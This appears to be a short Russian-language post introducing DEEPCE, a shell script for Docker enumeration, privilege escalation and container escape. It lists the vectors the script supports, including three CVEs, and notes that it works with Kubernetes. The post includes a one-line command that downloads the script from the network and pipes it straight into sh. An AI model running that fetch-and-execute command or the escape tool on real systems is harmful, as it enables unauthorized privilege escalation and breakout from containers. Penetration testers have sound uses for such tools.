Инструмент DEEPCE, название которого является абревиатурой от фразы Docker Enumeration, Escalation of Privileges and Container Escapes. Название говорит само за себя.



Для максимальной совместимости весь инструмент написан на sh без каких-либо зависимостей (1234 LoC). Но для ряда задач он все же ожидает что внутри также окажутся тулзы: curl, nmap, nslookup, dig. Также учитывайте, что при эксплуатации ряда векторов он может создавать контейнеры, перезапускать runC, что потенциально может навредить системе - будьте осторожны. При этом есть классная возможность скачать и запустить его без записи на диск:



wget -O - https://github.com/stealthcopter/deepce/raw/master/deepce.sh | sh



Поддерживаемые эксплоиты:

- DOCKER - использование docker group

- PRIVILEGED - использование привилегированного контейнера

- SOCK - использование docker sock

- CVE-2019-5736

- CVE-2019-5021

- CVE-2019-13139



Применимо ли это в Kubernetes? Да! Инструмент даже знает про kubectl ;)